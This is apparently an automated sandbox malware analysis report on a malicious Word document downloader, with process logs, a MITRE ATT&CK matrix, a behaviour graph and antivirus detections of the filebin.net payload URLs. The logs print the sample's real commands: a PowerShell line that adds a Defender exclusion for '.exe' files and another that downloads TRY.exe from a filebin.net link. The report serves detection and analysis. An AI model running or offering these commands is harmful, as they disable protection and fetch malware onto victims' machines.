Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2416Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1424Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1424Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\cmd.exe TID: 2476Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-2420
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB65E4C GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,GetLastError,9_2_000000013FB65E4C
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_000000013FB61F00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61C38 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,9_2_000000013FB61C38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB67F40 SetUnhandledExceptionFilter,9_2_000000013FB67F40
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB67C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_000000013FB67C44
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeProcess created: C:\Windows\System32\cmd.exe cmd /c thai.batJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB612C0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,9_2_000000013FB612C0
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB68114 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,9_2_000000013FB68114
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB629E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,9_2_000000013FB629E4

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Replication Through Removable Media		21
Scripting		1
Registry Run Keys / Startup Folder		1
Access Token Manipulation		21
Scripting		OS Credential Dumping1
System Time Discovery		1
Replication Through Removable Media		1
Archive Collected Data		Exfiltration Over Other Network Medium2
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
Native API		1
Services File Permissions Weakness		11
Process Injection		1
File Deletion		LSASS Memory11
Peripheral Device Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth21
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts3
Exploitation for Client Execution		Logon Script (Windows)1
Registry Run Keys / Startup Folder		21
Masquerading		Security Account Manager4
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Command and Scripting Interpreter		Logon Script (Mac)1
Services File Permissions Weakness		1
Modify Registry		NTDS17
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
Virtualization/Sandbox Evasion		LSA Secrets1
Query Registry		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Access Token Manipulation		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items11
Process Injection		DCSync21
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Services File Permissions Weakness		Proc Filesystem1
Remote System Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
Rundll32		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 611840 Sample: 12543_0008858249_FWDOUTSTAN... Startdate: 20/04/2022 Architecture: WINDOWS Score: 76 46 Multi AV Scanner detection for domain / URL 2->46 48 Antivirus detection for URL or domain 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 3 other signatures 2->52 9 msiexec.exe 4 11 2->9         started        13 WINWORD.EXE 292 25 2->13         started        15 rundll32.exe 2->15         started        process3 dnsIp4 42 filebin.net 185.47.40.36, 443, 49173 REDPILL-LINPRORedpillLinproNO Norway 9->42 44 situla.bitbit.net 87.238.33.8, 443, 49174 REDPILL-LINPRORedpillLinproNO Norway 9->44 38 C:\Windows\Installer\MSI9F1.tmp, PE32 9->38 dropped 17 msiexec.exe 5 9->17         started        40 C:\Users\user\...\~DFC2FF7A9553E7F48E.TMP, Composite 13->40 dropped file5 process6 process7 19 TRY.exe 1 3 17->19         started        21 expand.exe 4 17->21         started        24 icacls.exe 17->24         started        26 icacls.exe 17->26         started        file8 28 cmd.exe 19->28         started        34 C:\Users\user\AppData\...\TRY.exe (copy), PE32+ 21->34 dropped 36 C:\...\79bd875a22ddb24abfa2594fbd40eccf.tmp, PE32+ 21->36 dropped process9 process10 30 powershell.exe 7 28->30         started        32 powershell.exe 6 28->32         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
12543_0008858249_FWDOUTSTANDING_20200604.doc38%VirustotalBrowse
12543_0008858249_FWDOUTSTANDING_20200604.doc24%ReversingLabsWin32.Downloader.Mutisedow
12543_0008858249_FWDOUTSTANDING_20200604.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP100%Joe Sandbox ML
C:\Windows\Installer\MSI9F1.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI9F1.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
filebin.net5%VirustotalBrowse
situla.bitbit.net1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470100%Avira URL Cloudmalware
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi100%Avira URL Cloudmalware
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe100%Avira URL Cloudmalware
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:100%Avira URL Cloudmalware
https://filebin.net/rf43v6qzghbj7h7b/100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
filebin.net
185.47.40.36
truetrueunknown
situla.bitbit.net
87.238.33.8
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://filebin.net/rf43v6qzghbj7h7b/TRY.msitrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470~DFECA159C20646BB57.TMP.2.drtrue
  • Avira URL Cloud: malware
unknown
